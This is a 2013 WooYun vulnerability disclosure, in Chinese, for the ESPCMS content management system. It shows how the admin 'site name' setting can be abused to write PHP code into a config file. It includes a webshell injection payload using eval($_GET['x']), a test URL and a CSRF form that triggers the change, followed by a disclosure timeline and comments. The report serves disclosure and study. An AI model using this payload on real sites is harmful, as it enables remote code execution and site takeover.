当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(9) 关注此漏洞

缺陷编号: WooYun-2013-38391

漏洞标题: 代码审计系列4: 易思ESPCMS后台功能CSRF导致PHP代码执行

相关厂商: 易思ESPCMS企业网站管理系统

漏洞作者: LaiX

提交时间: 2013-09-28 11:39

公开时间: 2013-12-24 11:40

漏洞类型: CSRF

危害等级: 高

自评Rank: 20

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: php源码审核 任意文件写入利用 php 敏感文件操作参数未加过滤

2人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-28: 细节已通知厂商并且等待厂商处理中
2013-10-08: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2013-12-02: 细节向核心白帽子及相关领域专家公开
2013-12-12: 细节向普通白帽子公开
2013-12-22: 细节向实习白帽子公开
2013-12-24: 细节向公众公开

简要描述:

暂无

详细说明:

这是一个后台GETSHELL的漏洞,但是由于该程序没有对CSRF进行防御,所以可以导致CSRF直接GETshell,并且加重危害

漏洞证明:

问题页面:后台-系统设置-网站基本参数设置

对输入的数据并没有进行太过严格的过滤可以导致直接写入恶意PHP代码进配置文件

这里我们来测试一下'网站名称'这一项。

我们构造:

code 区域
',//hello



1.png





保存之后,我们来看看(command.php)

2.png





然后我们进一步构造:

code 区域
',);eval($_GET['x']);$CONFIG=Array(//



3.png





保存之后,我们来看看(command.php)

4.png





看起来没问题,我们试着访问

code 区域
**.**.**.**:8080/espcms/datacache/command.php?x=phpinfo();



5.png





接下来给出CSRF的测试代码

code 区域
<form id='test_form' action='**.**.**.**:8080/espcms/adminsoft/index.php?archive=management&action=setsave' method='POST' >
<input type='hidden' name='sitename' value='getshell啦' >
<input type='submit' name='submit' value='submit' >
</form>

修复方案:

过滤严格一点吧

版权声明:转载请注明来源 LaiX@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-12-24 11:40

厂商回复:

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2013-10-09 20:35 | LaiX ( 普通白帽子 | Rank:130 漏洞数:40 | SAINTSEC)
    0

    靠 都已经自动忽略了 赶紧来认领啊, 不行!!求补偿!!

  2. 2013-10-10 10:18 | wefgod ( 核心白帽子 | Rank:1825 漏洞数:183 | 力不从心)
    0

    @LaiX 同情一下

  3. 2013-10-12 09:17 | LaiX ( 普通白帽子 | Rank:130 漏洞数:40 | SAINTSEC)
    0

    @wefgod 感觉不会再爱了

  4. 2013-10-12 09:18 | wefgod ( 核心白帽子 | Rank:1825 漏洞数:183 | 力不从心)
    0

    @LaiX 辛苦了!

  5. 2013-10-25 15:11 | wefgod ( 核心白帽子 | Rank:1825 漏洞数:183 | 力不从心)
    0

    这个好像还不错啊

  6. 2013-12-15 18:49 | neal ( 普通白帽子 | Rank:219 漏洞数:23 )
    0

    骚年 为什么不考虑gpc

  7. 2013-12-24 18:57 | LaiX ( 普通白帽子 | Rank:130 漏洞数:40 | SAINTSEC)
    0

    @neal 你是来关注安全的,还是来反驳我达到装逼目的的。不管有没有开,并不代表漏洞不存在。

  8. 2014-07-17 20:33 | sec_jtn ( 普通白帽子 | Rank:134 漏洞数:56 | 本想无耻的刷rank,最后发现是我想太多了。...)
    0

    @LaiX 大牛可以把这句话改为签名了 你是来关注安全的,还是来反驳我达到装逼目的的。不管有没有开,并不代表漏洞不存在。

登录后才能发表评论,请先 登录